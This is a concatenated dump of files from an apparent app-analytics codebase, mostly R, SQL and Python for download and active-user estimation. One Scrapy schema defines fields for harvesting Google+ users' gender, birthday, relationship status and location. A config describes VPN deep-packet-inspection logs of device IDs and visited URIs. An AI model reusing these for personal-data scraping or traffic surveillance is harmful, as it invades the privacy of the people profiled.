legend(2000,9.5, c("Health","Defense"), lty=c(1,1), lwd=c(2.5,2.5),col=c("blue","red"))
cdf_data
}<file_sep>/google-analytics/rincon_dump/KR-Android/2016.03.04 - 2 - Linear Regression Models.r
country_codes = c('US','GB','CA','JP','KR')
device_type_codes = c('iPhone', 'Android Mobile')
country_codes = c('KR')
device_type_codes = c('iPhone')
coefficient_significances = c()
for (country_code in country_codes) {
print(country_code)
for (device_type_code in device_type_codes) {
print(device_type_code)
current_dataset = getPanelData(country_code, device_type_code)
rmse_iter_array = c()
adj_r2_iter_array = c()
abs_error_20_perc_array = c()
for (iter in 1:300){
k_folds = 4
k_fold_labels = sample(1:k_folds, size = nrow(current_dataset), replace=TRUE )
results_array = matrix(ncol = 2, nrow = k_folds)
total_apps_below_20_perc = 0
abs_perc_errors = c()
for (k in 1:k_folds) {
train_data = current_dataset[k_fold_labels != k,]
test_data = current_dataset[k_fold_labels == k,]
#### MODEL
lm_fit = lm(Active.Users ~ reporters_app +
downloads +
total_downloads +
reporters_app:downloads +
reporters_app:total_downloads
, data = train_data)
#### /MODEL
y_test_pred = predict(lm_fit, newdata = test_data)
rmse = sqrt( sum( (y_test_pred - test_data$Active.Users )^2) / length(y_test_pred) )
adj_r2 = summary(lm_fit)$adj.r.squared
results_array[k,1] = rmse
results_array[k,2] = adj_r2
abs_perc_error_test = 100.0 * abs(y_test_pred - test_data$Active.Users ) / test_data$Active.Users
abs_perc_errors = c(abs_perc_errors, abs_perc_error_test)
apps_below_20_perc_error = sum(abs_perc_error_test < 20)
total_apps_below_20_perc = total_apps_below_20_perc + apps_below_20_perc_error
}
averaged_results = colMeans(results_array, na.rm = TRUE)
current_rmse_avg = averaged_results[1]
current_adj_r2_avg = averaged_results[2]
rmse_iter_array = c(rmse_iter_array, current_rmse_avg)
adj_r2_iter_array = c(adj_r2_iter_array, current_adj_r2_avg)
abs_error_20_perc_array = c(abs_error_20_perc_array, 100 * total_apps_below_20_perc / nrow(current_dataset))
}
rmse_avg = mean(rmse_iter_array)
adj_r2_avg = mean(adj_r2_iter_array)
abs_error_20_perc_avg = mean(abs_error_20_perc_array)
baseline_results = getBaseline20PercAbsErrorRates(current_dataset)
plotCDFs(list('MyDM (baseline)' = baseline_results$abs_errors, 'Linear w/ Interaction' = abs_perc_errors),
title=paste(country_code, ' - ', device_type_code))
print(paste('RMSE: ', rmse_avg, '(', baseline_results$rmse, ')'))
print(paste('Adj R2: ', adj_r2_avg, '(', baseline_results$r2, ')'))
print(paste('20% Abs Error Percentage: ', abs_error_20_perc_avg, '(', baseline_results$perc_abs_error_20, ')'))
print("")
ref_rmse_avg = 15140
ref_adj_r2_avg = 0.94
ref_20_perc_abs_error_avg = 32.16
#print(summary(lm_fit)$coefficients[,'Pr(>|t|)'])
coefficient_significances = c(coefficient_significances, country_code, device_type_code, as.vector(summary(lm_fit)$coefficients[,'Pr(>|t|)']))
#print(paste('(Delta) RMSE: ', rmse_avg - ref_rmse_avg))
#print(paste('(Delta) Adj R2: ', adj_r2_avg - ref_adj_r2_avg))
#print(paste('(Delta) 20% Abs Error Percentage: ', abs_error_20_perc_avg - ref_20_perc_abs_error_avg))
}
}
backup_coef_significances = coefficient_significances
dim(coefficient_significances) = c(length(lm_fit$coefficients) + 2,10)
coefficient_significances = as.data.frame(t(coefficient_significances))
names(coefficient_significances) = c('Country', 'Device Type', names(lm_fit$coefficients) )
coefficient_significances[,-c(1,2)] = apply(X = coefficient_significances[,-c(1,2)], MARGIN = 1:2, FUN = function(x) as.double(x))
<file_sep>/int-vs-m-benchmark/sql/android/1001h1-create_appannie_distimo_mappings.sql
/*
Create (hard-coded) mappings between App Annie and Distimo tables.
*/
/* Mappings between feed and (device, type) */
drop table if exists aa_benchmarking_android.feed_device_type_mappings;
create table aa_benchmarking_android.feed_device_type_mappings(
feed int unsigned not null,
feed_name varchar(20) not null,
type ENUM('paid','gross','free') NOT NULL,
constraint primary key (feed) );
insert into aa_benchmarking_android.feed_device_type_mappings
(feed, feed_name, type)
values
(0, "ANDROID_FREE", 'free'),
(1, "ANDROID_PAID", 'paid'),
(2, "ANDROID_GROSSING", 'gross');
/* Country mappings using names. */
drop temporary table if exists temp.aa_countries;
create temporary table temp.aa_countries (
id int,
name varchar(40)) ;
insert into temp.aa_countries
(id, name)
values
(1, 'Australia'),
(2, 'Canada'),
(3, 'China'),
(4, 'Germany'),
(5, 'Spain'),
(6, 'France'),
(7, 'United Kingdom'),
(8, 'Italy'),
(9, 'Japan'),
(10, 'United States'),
(11, 'Belgium'),
(12, 'Switzerland'),
(13, 'Chile'),
(14, 'South Africa'),
(15, 'Vietnam'),
(16, 'Hong Kong'),
(17, 'Argentina'),
(18, 'Brazil'),
(19, 'India'),
(20, 'Finland'),
(21, 'Indonesia'),
(22, 'Russia'),
(23, 'Netherlands'),
(24, 'Malaysia'),
(25, 'Turkey'),
(26, 'Mexico'),
(27, 'South Korea'),
(28, 'Poland'),
(29, 'Thailand'),
(30, 'Taiwan'),
(31, 'Philippines'),
(32, 'Singapore'),
(33, 'Egypt'),
(34, 'Sweden'),
(35, 'Austria'),
(36, 'Czech Republic'),
(37, 'Hungary'),
(38, 'Denmark'),
(39, 'Ireland'),
(40, 'Israel'),
(41, 'New Zealand'),
(42, 'Norway'),
(43, 'Portugal'),
(44, 'Romania'),
(45, 'Slovakia'),
(46, 'Greece'),
(47, 'Bulgaria'),
(48, 'Ukraine'),
(49, 'United Arab Emirates'),
(50, 'Kuwait');
drop table if exists aa_benchmarking_android.country_mappings;
create table aa_benchmarking_android.country_mappings (
`store_id` int unsigned NOT NULL,
`appannie_name` varchar(48) NOT NULL,
`iso_code` varchar(2) NOT NULL,
`country_id` smallint(5) unsigned NOT NULL,
`distimo_name` varchar(48) NOT NULL,
constraint primary key(store_id),
index(country_id),
index(iso_code)
)
select
aa_cn.id as store_id,
aa_cn.name as appannie_name,
cn.iso_code,
cn.id as country_id,
cn.name as distimo_name
from
generic.countries cn
join temp.aa_countries aa_cn
using(name)
join market.countries cn
using(iso_code)
;
/* Category mappings using similar names. */
drop temporary table if exists temp.aa_categories;
create temporary table temp.aa_categories
(id int, external_name varchar(40), name varchar(40));
insert into temp.aa_categories
(id, external_name, name)
values
(1, 'OVERALL', 'Overall'),
(2, 'GAME', 'Games'),
(3, 'ARCADE', 'Games Arcade & Action'),
(4, 'BRAIN', 'Games Brain & Puzzle'),
(5, 'CARDS', 'Games Cards & Casino'),
(6, 'CASUAL', 'Games Casual'),
-- (7, 'GAME_WALLPAPER', 'Games Live Wallpaper'), excluded since not always present
(8, 'RACING', 'Games Racing'),
(9, 'SPORTS_GAMES', 'Games Sports'),
-- (10, 'GAME_WIDGETS', 'Games Widgets'), excluded since not always present
(11, 'APPLICATION', 'Applications'),
-- (12, 'BOOKS_AND_REFERENCE', 'Books & Reference'), excluded since not always present
(13, 'BUSINESS', 'Business'),
(14, 'COMICS', 'Comics'),
(15, 'COMMUNICATION', 'Communication'),
(16, 'EDUCATION', 'Education'),
(17, 'ENTERTAINMENT', 'Entertainment'),
(18, 'FINANCE', 'Finance'),
(19, 'HEALTH_AND_FITNESS', 'Health & Fitness'),
(20, 'LIBRARIES_AND_DEMO', 'Libraries & Demo'),
(21, 'LIFESTYLE', 'Lifestyle'),
(22, 'APP_WALLPAPER', 'Apps Live Wallpaper'),
(23, 'MEDIA_AND_VIDEO', 'Media & Video'),
(24, 'MEDICAL', 'Medical'),
(25, 'MUSIC_AND_AUDIO', 'Music & Audio'),
(26, 'NEWS_AND_MAGAZINES', 'News & Magazines'),
(27, 'PERSONALIZATION', 'Personalization'),
(28, 'PHOTOGRAPHY', 'Photography'),
(29, 'PRODUCTIVITY', 'Productivity'),
(30, 'SHOPPING', 'Shopping'),
(31, 'SOCIAL', 'Social'),
(32, 'SPORTS', 'Sports'),
(33, 'TOOLS', 'Tools'),
(34, 'TRANSPORTATION', 'Transportation'),
(35, 'TRAVEL_AND_LOCAL', 'Travel & Local'),
(36, 'WEATHER', 'Weather'),
(37, 'APP_WIDGETS', 'App Widgets'),
(38, 'GAME_ACTION', 'Games Action'),
(39, 'GAME_ADVENTURE', 'Games Adventure'),
(40, 'GAME_WORD', 'Games Word'),
(41, 'GAME_ARCADE', 'Games Arcade'),
(42, 'GAME_BOARD', 'Games Board'),
(43, 'GAME_CARD', 'Games Card'),
(44, 'GAME_CASINO', 'Games Casino'),
(6, 'GAME_CASUAL', 'Games Casual'),
(46, 'GAME_EDUCATIONAL', 'Games Educational'),
(47, 'GAME_FAMILY', 'Games Family'),
(48, 'GAME_MUSIC', 'Games Music'),
(49, 'GAME_PUZZLE', 'Games Puzzle'),
(8, 'GAME_RACING', 'Games Racing'),
(51, 'GAME_ROLE_PLAYING', 'Games Role Playing'),
(52, 'GAME_SIMULATION', 'Games Simulation'),
(9, 'GAME_SPORTS', 'Games Sports'),
(54, 'GAME_STRATEGY', 'Games Strategy'),
(55, 'GAME_TRIVIA', 'Games Trivia');
drop table if exists aa_benchmarking_android.category_mappings;
create table aa_benchmarking_android.category_mappings (
`appannie_category_id` smallint(5) unsigned NOT NULL,
`appannie_name` varchar(80) NOT NULL,
`distimo_category_id` smallint(5) unsigned NOT NULL,
`distimo_name` varchar(80) NOT NULL,
constraint primary key (appannie_category_id, distimo_category_id),
index(distimo_category_id, appannie_category_id))
select
aa_cg.id as appannie_category_id,
aa_cg.name as appannie_name,
cg.id as distimo_category_id,
cg.name as distimo_name
from
market.categories cg
JOIN (
SELECT
DISTINCT category_id
FROM
temp.rankings
) x
ON x.category_id = cg.id
JOIN temp.aa_categories aa_cg
ON (
cg.external_name = aa_cg.external_name
OR (
cg.external_name IS NULL
AND (
cg.name = concat('Top ', aa_cg.name)
OR REPLACE(cg.name, 'Games-', 'Games ') = aa_cg.name
)
)
)
;<file_sep>/evaluation/py/merge_other_info.py
import sys
import os, os.path
from collections import defaultdict
import itertools
import pandas as pd
def main():
args_num = len(sys.argv)
sbe_dir = sys.argv[1]
other_info_dir = sys.argv[2:(args_num - 1)]
output_dir = sys.argv[args_num - 1]
input_files = _listdir_with_fullpath(sbe_dir) + list(itertools.chain(*[_listdir_with_fullpath(d) for d in other_info_dir]))
input_files = filter(lambda s: s.endswith('.csv'), input_files)
g = _group_same_filenames(input_files)
for (group_name, files) in g:
if len(files) != len(other_info_dir) + 1:
print("Confused with the files: %s" % files)
continue
df = _merge_other_info(map(pd.read_csv, files))
df.to_csv(os.path.join(output_dir, group_name), index=False)
def _listdir_with_fullpath(d):
return [os.path.join(d, i) for i in os.listdir(d)]
def _group_same_filenames(paths):
# Corresponding est and real values should have the same base name.
# Despite that they're in different dirs.
d = defaultdict(list)
for s in paths:
d[os.path.basename(s)].append(s)
return d.iteritems()
def _merge_other_info(dfs):
merged = dfs[0]
for new_df in dfs[1:]:
merged = pd.merge(merged, new_df, on=['app_id'], how='inner')
return merged
if __name__ == '__main__':
main()
<file_sep>/audience/google-plus-scraping/lib/scraper/scraper/items.py
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class ScraperItem(scrapy.Item):
account_id = scrapy.Field()
account_name = scrapy.Field()
# Basic information
gender = scrapy.Field()
looking_for = scrapy.Field()
birthday = scrapy.Field()
relationship = scrapy.Field()
other_names = scrapy.Field()
# Apps with G+ signin-in
apps_with_signin = scrapy.Field()
# Other members having person in circles
in_circles = scrapy.Field()
# All education institutes
school_names = scrapy.Field()
occupation = scrapy.Field()
# Current location
place = scrapy.Field()<file_sep>/aa_au_model/lib/config.py
BUCKET_DIR = '/s3mnt-projecta/aardvark-prod-pdx-ds-sample/'
DATATYPE_BUCKET_DATA_DIRS = {'ingest': 'VPN_DPI_INGEST',
'session': 'VPN_APP_USAGE_SESSION',
'download': 'VPN_DOWNLOAD_TAGGING',
'pause': 'VPN_PAUSE_RESUME_SESSION',
'connection': 'VPN_CONNECTION_SESSION',
'device_info': 'VPN_NEW_DEVICE_INFO'}
DATATYPE_COLUMN_NAMES = {'ingest': ['timestamp','device_id','country','city','uri','user_agent','bundle_id','offset'],
'session': ['device_id','country','city','bundle_id','startTime','endTime','offset'],
'download': ['timestamp','device_id','device_type','download_type','bundle_id','country','offset'],
'pause': ['device_id','start_timestamp','end_timestamp','offset'],
'connection': ['device_id','start_timestamp','end_timestamp','offset'],
'device_info': ['device_id', 'carrier', 'manufacturer', 'model', 'platform', 'device_type', 'os_version', 'bundle_id', 'publisher_id'],
'dpi_apps': ['bundle_id','version'],
'wau': ['external_id','date','platform','device','country','wau'],
'freq_week': ['external_id','date','platform','device','country','nr_of_uses'],
'duration_week': ['external_id','date','platform','device','country','duration'],
'details_kpi': ['external_id','date','platform','device','country','active_users_sample','sample_size','proportion','estimate_au','rel_error','estimation_quality_indicator','rel_change','au_changes_time_indicator','correct_estimate_au','au_quality']}
DOWNLOAD_TYPES = {0: 'purchase', 1: 'download', 2: 'update', 4: 'unknown'}
ISO_CODE = 'US'
### platforms and devices for results metrics
platforms = {1: 'Google Play', 2: 'iOS'}
devices = {0: 'all', 1: 'smartphone', 2: 'tablet'}
<file_sep>/aa_au_model/main.py
from correction import data
if __name__ == '__main__':
print 'Start dumping:'
mdm_v1_1 = data.load_mdm_au()
mdm_v1_1.to_csv('./mdm_v1.1_dump.csv', index=False)
print 'Dump finished!'
<file_sep>/product_quality/internal/utilities.py
'''
Created on Apr 19, 2013
@author: perezrafael
'''
import utilities_pandas
import commands
def _fetch_from_db(platform, store, unit, dtstart, dtend):
if platform =='ios':
table = 'aa_staging'
column = 'app_id'
elif platform == 'android':
table = 'aa_staging_android'
column = 'app_class'
common_suffix = 'WHERE d.store_id=%s ' % store + \
'AND d.date >= DATE(\'%s\') ' % dtstart + \
'AND d.date <= DATE(\'%s\'))' % dtend
if unit == 'Downloads':
cmd = 'echo "COPY (SELECT date, ' + column + ', units FROM downloads d ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U aa -h nile ' + table
elif unit == 'USD':
cmd = 'echo "COPY (SELECT date, ' + column + ', revenue FROM sales d ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U aa -h nile ' + table
else:
raise Exception('Unit types should be Downloads or USD')
status, stdout = commands.getstatusoutput(cmd)
if status is None or status >= 2:
raise Exception("Have problem fetching daily estimation: %s" % cmd)
return utilities_pandas.convert_str_to_df(stdout)
<file_sep>/int-vs-m-benchmark/android-install-vs-downloads/window_optimization.py
import numpy
import scipy.stats
import time
from pandas import DataFrame
def get_decaying_window_function(decay, delay, window_size):
""""
Generate a normalized decaying window function.
Follows the function
y(t) = exp(-(t - t_max + s) * lambda) if t <= t_max - s
0 else
where t = [0, t_max]
@param delay: point at which the decay window should start (s)
@param decay: decay constant (lambda)
@param window_size: size of the window (t_max)
@returns: exponential decay window function
"""
N_DATA_POINT = 9
time_vector = numpy.arange(0, N_DATA_POINT)
window_function = numpy.exp(-(time_vector - N_DATA_POINT + delay) *
decay)
if delay > 0:
window_function[:delay] = 0
window_function[window_size:] = 0
window_function = window_function / sum(window_function)
return window_function
def get_window_error(df, window_function, verbose=False):
"""
Get the error for a window function.
@param df: DataFrame
@param window_function: array with window function
@param verbose: if True print progress info
@returns: average error over all dates and iso_codes in df
"""
df = compute_window_value(df, window_function)
error_list = []
fit_groups = df.groupby(['date', 'iso_code'])
for ii, (key, data) in enumerate(fit_groups):
fmin_output = scipy.optimize.fmin_slsqp(objective_function,
[data['log_value'].max(), 0, 0, 0],
ieqcons=[constraint_function],
args=(data,),
iprint=0, full_output=1)
params, error = fmin_output[:2]
error = compute_r_squared(params, data)
error_list.append(error)
if verbose:
print("%s/%s: %1.2f" % (ii, len(fit_groups), error))
return error_list
def compute_window_value(df, window_function, metric='user'):
"""
Compute averaged (log) values using a window.
@param df: DataFrame with cols with actuals in column metric
@param window_function: array with window function
@param metric: column to use for weighted average
@returns: Adjusted DataFrame df
"""
df['value'] = numpy.inner(df[metric], window_function)
df['log_value'] = numpy.log(df['value'])
return df
def objective_function(x, data):
"""
Function to optimize.
@param x: parameters
@param data: DataFrame with log ranks and value
@returns: SSE
"""
#difference = numpy.exp(data['log_value']) - numpy.exp(fit_function(x, data))
is_analytics_app = data['log_value'].notnull()
difference = (data['log_value'][is_analytics_app] -
fit_function(x, data.ix[is_analytics_app]))
objective = numpy.nansum(difference ** 2)
return objective
def exponential_objective_function(x, data):
"""
Function to optimize.
@param x: parameters
@param data: DataFrame with log ranks and value
@returns: SSE
"""
difference = numpy.exp(data['log_value']) - numpy.exp(fit_function(x, data))
objective = numpy.sqrt(numpy.nansum(difference ** 2))
return objective
def compute_r_squared(x, data):
"""
Compute the adjusted R^2 value in the log-log domain.
@param x: paramaeters
@param data: DataFrame with log ranks and log value
@returns: R^2 value
"""
is_analytics_app = data['log_value'].notnull()
y_hat = fit_function(x, data.ix[is_analytics_app])
y_bar = numpy.mean(data['log_value'][is_analytics_app])
ss_reg = numpy.sum((y_hat - y_bar)**2)
ss_tot = numpy.sum((data['log_value'][is_analytics_app] - y_bar)**2)
df_reg = len(is_analytics_app) - 4 - 1
df_tot = len(is_analytics_app) - 1
return 1. - (ss_reg / df_reg) / (ss_tot / df_tot)
def compute_r_squared_exp(x, data):
"""
Compute the adjusted R^2 value in the normal domain.
@param x: paramaeters
@param data: DataFrame with log ranks and value
@returns: R^2 value
"""
is_analytics_app = data['log_value'].notnull()
y_hat = numpy.exp(fit_function(x, data.ix[is_analytics_app]))
y_bar = numpy.mean(data['value'][is_analytics_app])
ss_reg = numpy.sum((y_hat - y_bar)**2)
df_reg = len(is_analytics_app) - 4 - 1
df_tot = len(is_analytics_app) - 1
ss_tot = numpy.sum((data['value'][is_analytics_app] - y_bar)**2)
return 1. - (ss_reg / df_reg) / (ss_tot / df_tot)
def fit_function(x, data):
"""
Get y values for parameters.
@param x: parameters
@param data: DataFrame with log ranks
@returns: fitted values
"""
return (x[0] + x[1] * data['log_rank'] +
x[2] * data['log_rank_2'] +
x[3] * data['log_rank_3'])
def constraint_function(x, data):
"""
Derivative constraint function.
@param x: parameters
@param data: DataFrame with log ranks and value
@returns: 1 if any of the derivatives are > 0, else 0
"""
y = fit_function(x, data)
return sum(numpy.diff(y) > 0)
def compute_parameter_error(data, parameters, verbose=False):
"""
Compute errors for window parameters.
@param data: DataFrame
@parameters: list with parameters for window function
@param verbose: if True print progress info
"""
t0 = time.time()
window_function = get_decaying_window_function(*parameters)
error = get_window_error(data, window_function, verbose)
if verbose:
print('%1.0fs - %1.2f - %1.2f - %s'
% (time.time() - t0, numpy.mean(error), parameters))
return error
<file_sep>/old_investigations/multi_scaling.py
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import os, os.path
import datetime
import sys
# plot top 30 linear
# plot top 30 semi-logarithmic
# plot log-logarithmic (all)
# plot top 200 linear
def split_train_test(df, train_days):
dates = np.sort(df['date'].unique())
train_dates = pd.DataFrame({'date': dates[:train_days]})
test_dates = pd.DataFrame({'date': dates[train_days:]})
train_set = df.merge(train_dates, on=['date'])
test_set = df.merge(test_dates, on=['date'])
return train_set, test_set
def build_model(df, train_days, K = None):
train_set, test_set = split_train_test(df, train_days)
weights = None
if K is not None:
weights = pd.DataFrame(K/df.groupby('date')['units'].sum()).reset_index()
weights.rename(columns={'units':'weight'}, inplace=True)
train_set = train_set.merge(weights, on='date')
test_set = test_set.merge(weights, on='date')
train_set['scaled_units'] = train_set['units'] * train_set['weight']
estimates = train_set[['rank', 'scaled_units']].groupby(['rank']).mean().reset_index()
train_set = train_set.merge(estimates, on = ['rank']).rename(columns={'scaled_units_y': 'scaled_units', 'scaled_units_y': 'scaled_estimate'})
#train_set['scaled_estimate'] /= train_set['weight']
test_set = test_set.merge(estimates, on = ['rank']).rename(columns={'scaled_units_y': 'scaled_units', 'scaled_units': 'scaled_estimate'})
#test_set['scaled_estimate'] /= test_set['weight']
estimates = train_set[['rank', 'units']].groupby(['rank']).mean().reset_index()
train_set = train_set.merge(estimates, on='rank')
train_set.rename(columns={'units_x': 'units', 'units_y': 'estimate'}, inplace=True)
test_set = test_set.merge(estimates, on='rank')
test_set.rename(columns={'units_x': 'units', 'units_y': 'estimate'}, inplace=True)
return train_set, test_set, weights
def append_weekdays(df):
df_weekday = []
for index, value in df['date'].iteritems():
weekday = datetime.datetime.strptime(value, '%Y-%m-%d')
weekday = weekday.weekday()
df_weekday.append(weekday)
df['weekday'] = pd.Series(df_weekday)
return df
def plot_sets(train_set, test_set, max_rank, weights=False, fig_file=None, plot_actuals=False):
train_set = train_set[train_set['rank'] <= max_rank]
test_set = test_set[test_set['rank'] <= max_rank]
ax = plt.subplot(121)
if not plot_actuals:
p1, = plt.plot(train_set[train_set['weekday']<5]['rank'], train_set[train_set['weekday']<5]['units'], 'bo', alpha=0.4)
p1b, = plt.plot(train_set[train_set['weekday']>=5]['rank'], train_set[train_set['weekday']>=5]['units'], 'go', alpha=0.4)
if weights:
if plot_actuals:
p3,= plt.plot(train_set['rank'], train_set['units']*train_set['weight'], 'r^', alpha=0.4)
else:
df1 = train_set[['rank','scaled_estimate']].drop_duplicates()
df1['key'] = 1
df2 = train_set[['weight']].drop_duplicates()
df2['key'] = 1
df2 = df2.merge(df1, on='key')[['rank','scaled_estimate','weight']]
p3,= plt.plot(df2['rank'], df2['scaled_estimate']/df2['weight'], 'r^', alpha=0.4)
if not plot_actuals:
p2, =plt.plot(train_set['rank'], train_set['estimate'], 'ks', alpha=0.4)
if weights:
if plot_actuals:
plt.legend([p3], ['Scaled Actuals'])
else:
plt.legend([p1, p1b, p2, p3], ['Actuals Weekday', 'Actuals Weekend', 'Original Estimates', 'Scaled Estimates'])
else:
plt.legend([p1, p1b, p2], ['Actuals Weekday', 'Actuals Weekend', 'Estimates'])
plt.grid(True, which='both')
plt.xlabel('rank')
plt.ylabel('downloads (20 days)')
if max_rank >= 500 :
ax.set_xscale('log')
ax.set_yscale('log')
plt.axis('equal')
xaxis = ax.xaxis.get_majorticklocs()
yaxis = ax.yaxis.get_majorticklocs()
ax = plt.subplot(122)
if not plot_actuals:
plt.plot(test_set[test_set['weekday']<5]['rank'], test_set[test_set['weekday']<5]['units'], 'bo', alpha=0.4)
plt.plot(test_set[test_set['weekday']>=5]['rank'], test_set[test_set['weekday']>=5]['units'], 'go', alpha=0.4)
if weights:
if plot_actuals:
plt.plot(test_set['rank'], test_set['units']*test_set['weight'], 'r^', alpha=0.4)
else:
df1 = train_set[['rank','scaled_estimate']].drop_duplicates()
df1['key'] = 1
df2 = test_set[['weight']].drop_duplicates()
df2['key'] = 1
df2 = df2.merge(df1, on='key')[['rank','scaled_estimate','weight']]
plt.plot(df2['rank'], df2['scaled_estimate']/df2['weight'], 'r^', alpha=0.4)
if not plot_actuals:
plt.plot(train_set['rank'], train_set['estimate'], 'ks', alpha=0.4)
plt.grid(True, which='both')
plt.xlabel('rank')
plt.ylabel('downloads (next 11 days)')
if max_rank >= 500 :
ax.set_xscale('log')
ax.set_yscale('log')
plt.axis('equal')
ax.xaxis.set_ticks(xaxis)
ax.yaxis.set_ticks(yaxis)
ax.set_yticklabels([])
#ax.yaxis.ticks.set_visible(False)
if fig_file is None:
plt.show()
else:
plt.savefig(fig_file)
plt.close()
def plot_weights(weights, fig_file):
weights['weight'] /= weights['weight'].max()
plt.plot(weights['weight'], color='black', lw=2.0, marker='s')
plt.grid(True, which='both')
plt.xlabel('Day')
plt.ylabel('Weight')
if fig_file is None:
plt.show()
else:
plt.savefig(fig_file)
plt.close()
def get_ranked_apps(actuals_file):
ranks_dir = './cache/raw_estimation'
df_ranks = pd.DataFrame(columns=['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id', 'store_id'])
for root, dirs, files in os.walk(ranks_dir):
for f in files:
fullpath = os.path.join(root, f)
df_ranks = df_ranks.append(pd.read_csv(fullpath), ignore_index=True)
df_actuals = pd.read_csv(actuals_file)
df_ranks = df_ranks.merge(df_actuals, on=['app_id', 'date'])
return df_ranks[['category_id', 'rank', 'app_id', 'date', 'feed_id', 'store_id', 'units']]
def gen_weights(df, K=12345):
weights = pd.DataFrame(K/df.groupby('date')['units'].sum()).reset_index()
weights.rename(columns={'units':'weight'}, inplace=True)
df = df.merge(weights, on='date')
return df
def gen_daily_statistics(df, quantiles, K=12345):
gdf = df.groupby('date')
s = 1.0/quantiles
ndf = gdf['date'].count().reset_index()
ndf.rename(columns={0: 'count'}, inplace=True)
ndf = ndf.merge(gdf['units'].sum().reset_index(), on='date')
ndf.rename(columns={'units': 'sum_actuals'}, inplace=True)
ndf['sum_actuals'] = np.log(ndf['sum_actuals'])
ndf['weight'] = K/ndf[['sum_actuals']]
for step in np.arange(0, 1+s, s):
ndf = ndf.merge(gdf['rank'].quantile(step).reset_index(), on='date')
ndf.rename(columns={0: 'rank_quantile_%s'%step}, inplace=True)
ndf = ndf.merge(gdf['units'].quantile(step).reset_index(), on='date')
ndf.rename(columns={0: 'actuals_quantile_%s'%step}, inplace=True)
return ndf
def normalize_df(df):
for column, series in df.iteritems():
try:
df[column] = df[column]*1.0/df[column].max()
except:
pass
return df
def filter_out_universals(df):
rdf = df
for index, series in df[['category_id']].drop_duplicates().iterrows():
category = series['category_id']
cdf = df[df['category_id']==category][['date', 'app_id', 'feed_id', 'category_id']]
fdf = cdf[(cdf['feed_id']==0) | (cdf['feed_id']==101)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['remove'] = True
fdf['category_id'] = category
fdf['feed_id'] = 0
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
rdf = rdf[rdf['remove'] != True].drop('remove', axis=1)
fdf['feed_id'] = 101
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
rdf = rdf[rdf['remove'] != True].drop('remove', axis=1)
fdf = cdf[(cdf['feed_id']==1) | (cdf['feed_id']==100)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['remove'] = True
fdf['feed_id'] = 1
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
rdf = rdf[rdf['remove'] != True].drop('remove', axis=1)
fdf['feed_id'] = 100
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
rdf = rdf[rdf['remove'] != True].drop('remove', axis=1)
fdf = cdf[(cdf['feed_id']==2) | (cdf['feed_id']==102)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['remove'] = True
fdf['feed_id'] = 2
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
rdf = rdf[rdf['remove'] != True].drop('remove', axis=1)
fdf['feed_id'] = 102
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
rdf = rdf[rdf['remove'] != True].drop('remove', axis=1)
return rdf
def plot_stats(df, country):
df = df[['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id', 'store_id', 'units']]
#df = df[df['category_id'] == category]
#df = df[df['feed_id'] == feed]
for index, series in df[['category_id']].drop_duplicates().iterrows():
category = series['category_id']
andf = df[df['category_id'] == category]
for index2, series2 in andf[['feed_id']].drop_duplicates().iterrows():
feed = series2['feed_id']
ndf = andf[andf['feed_id'] == feed]
ndf = gen_daily_statistics(ndf, 4)
ndf = normalize_df(ndf)
ndf = ndf.reindex_axis(sorted(ndf.columns), axis=1)
#fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(30, 10))
ndf[['rank_quantile_0.0', 'rank_quantile_0.25','rank_quantile_0.5','rank_quantile_0.75','rank_quantile_1.0',]] \
.plot() \
.grid(True, which='both')
#corr = ndf['sum_actuals'].corr(ndf['rank_quantile_0.5'])
plt.title('Quantiles of ranks')
plt.savefig(plots_dir+'stats/rank_%s_%s_%s.png'%(country, category, feed))
ndf[['actuals_quantile_0.0', 'actuals_quantile_0.25','actuals_quantile_0.5','actuals_quantile_0.75','actuals_quantile_1.0',]] \
.plot() \
.grid(True, which='both')
#corr = ndf['sum_actuals'].corr(ndf['actuals_quantile_0.5'])
plt.title('Quantiles of actuals')
plt.savefig(plots_dir+'stats/actuals_%s_%s_%s.png'%(country, category, feed))
ndf[['sum_actuals', 'count']] \
.plot() \
.grid(True, which='both')
#plt.title('%s_%s_%s'%(country, category, feed))
corr = ndf['sum_actuals'].corr(ndf['count'])
plt.title('sum_actuals vs count')
plt.savefig(plots_dir+'stats/count_%s_%s_%s.png'%(country, category, feed))
def plot_rank_buckets(df, country, function, bucket_size=100, max_rank=1000):
limit = np.arange(0, max_rank+bucket_size, bucket_size)
weekdays = get_weekdays(df)
for index, series in df[['category_id']].drop_duplicates().iterrows():
category = series['category_id']
andf = df[df['category_id'] == category]
for index2, series2 in andf[['feed_id']].drop_duplicates().iterrows():
feed = series2['feed_id']
ndf = andf[andf['feed_id'] == feed]
p = []
labels = []
plt.clf()
fig = plt.figure(1)
ax = fig.add_subplot(111)
for i in range(len(limit)-1):
rdf = ndf[(ndf['rank']>limit[i]) & (ndf['rank']<=limit[i+1])]
if rdf.shape[0]>0:
rdf = rdf.groupby('date')
if function == 'count':
rdf = rdf.count()
elif function == 'sum':
rdf = normalize_df(rdf.sum())
elif function == 'avg':
rdf = normalize_df(rdf.mean())
p1, = ax.plot(rdf['units'])
p.append(p1)
labels.append('%s-%s'%(limit[i]+1, limit[i+1]))
